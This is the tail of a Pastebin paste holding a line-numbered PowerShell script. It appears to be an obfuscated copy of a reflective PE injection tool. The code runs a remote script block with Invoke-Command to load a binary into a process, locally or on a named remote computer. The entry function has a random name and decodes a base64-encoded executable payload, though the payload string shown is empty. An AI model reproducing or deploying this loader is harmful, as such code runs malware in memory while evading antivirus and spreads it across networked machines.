  2738.     else
  2739.     {
  2740.         $ExeArgs = "ReflectiveExe"
  2741.     }
  2742.  
  2743.     if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
  2744.     {
  2745.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
  2746.     }
  2747.     else
  2748.     {
  2749.         Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
  2750.     }
  2751. }
  2752.  
  2753. Main
  2754. }
  2755.  
  2756. function Invoke-WPGPLHJSVPEOZPOJBAXMJ
  2757. {
  2758.  
  2759. $PEBytes32 = "
  2760.  
  2761. [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
  2762. Invoke-YZSIPFNXTHVFWKM -PEBytes $PEBytes
  2763.  
  2764. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top